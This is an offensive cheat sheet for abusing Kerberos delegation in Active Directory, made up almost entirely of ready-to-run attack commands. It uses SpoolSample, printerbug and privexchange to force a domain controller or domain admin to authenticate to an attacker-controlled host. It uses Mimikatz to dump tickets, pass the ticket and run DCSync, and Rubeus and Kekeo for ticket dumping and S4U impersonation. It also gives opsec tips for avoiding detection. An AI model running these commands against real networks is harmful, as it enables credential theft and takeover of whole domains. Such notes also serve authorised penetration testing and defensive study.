Delegation

Unconstrained delegation

https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/

Requirements
  1. Control over an account with unconstrained delegation privileges
  2. A way to connect victim users/computers to us
Make a DA connect to us

https://github.com/leechristensen/SpoolSample

.\SpoolSample.exe <DC> <compromised_host>
python printerbug.py <VICTIM>/<user>:<password>@<dc.internal.dom> <client_share>
python privexchange.py -u <user> -p <password> -ah <evil.internal.dom> <exchange.internal.dom> -d <internal.dom>
Mimikatz

Opsec unsafe: Touches LSASS!

The user <COMPUTER$> should get the TGT

sekurlsa::tickets
kerberos::ptt ticket.kirbi
lsadump::dcsync /domain:<domain> /user:<user>
Rubeus

Opsec safer: Uses LSACallAuthenticationPackage with a GetSystem token elevation approach, but LSASS isn’t touched!

Rubeus.exe dump
Rubeus.exe monitor [/interval:SECONDS] [/filteruser:USER]

Constrained delegation

Kekeo

Request tgt

tgt::ask /user:<VULN_ACCOUNT> /domain:<DOMAIN> /rc4:<RC4key>
tgt::ask /user:<VULN_ACCOUNT> /domain:<DOMAIN> /aes:<AESkey>

ptt via s4u

tgs::s4u /user:<IMPERSONATED_USER>@<domain> /service:<DELEGATED_SVC>/<FQDN_MACHINE> /ptt /tgt:<TGT_FILE>
Rubeus

ptt via s4u

Rubeus.exe s4u /user:<user_with delegation> /domain:<DOMAIN> /rc4:<RC4key> /impersonateuser:<user_impersonated> /msdsspn:"<delegated_svc>/<FQDN_machine>" /ptt

Constrained delegation with Protocol Transition

Resource-based Constrained delegation

- https://gist.github.com/HarmJ0y/224dbfef83febdaf885a8451e40d52ff#file-rbcd_demo-ps1-L16